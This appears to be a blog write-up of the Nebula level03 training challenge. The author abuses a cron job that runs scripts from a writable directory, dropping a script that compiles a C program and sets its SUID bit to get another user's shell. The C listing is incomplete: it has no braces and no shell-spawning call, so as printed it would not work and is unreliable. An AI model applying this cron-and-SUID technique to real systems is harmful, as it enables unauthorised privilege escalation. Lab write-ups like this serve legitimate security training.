Nebula – level03

There is no code to exploit in this challenge but we have to exploit a cron job which runs after each couple of minutes. There is a crontab in writable.d and a script in the /home/flag03

for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"

We have to make a C/C++ program which will SUID enabled.

I used the code from the level02


int main()
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();

setresgid(gid, gid, gid);
setresuid(uid, uid, uid);

return 0;

I tried to save it in /home/flag03, but i didn’t had enough permission :/
But i have the permission to make a file inside writable.d..Then i copied the output file of the above program into writable.d/ and waited for few minutes. But that didn’t also work :/

Finally i succeeded in this step. I made an executable shell script inside which will compile the above given code and put the output file in /home/flag03 which is suid bit set.

$ vim writable.d/job1

gcc /tmp/shell.c -o /home/flag03/shell
chmod +s /home/flag03/shell
chmod +x job1

I waited for few minutes and after that an executable file named shell with suid set file appeared in /home/flag03/
I didn’t waste much time. I executed the shell file and got flag03 shell \m/


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s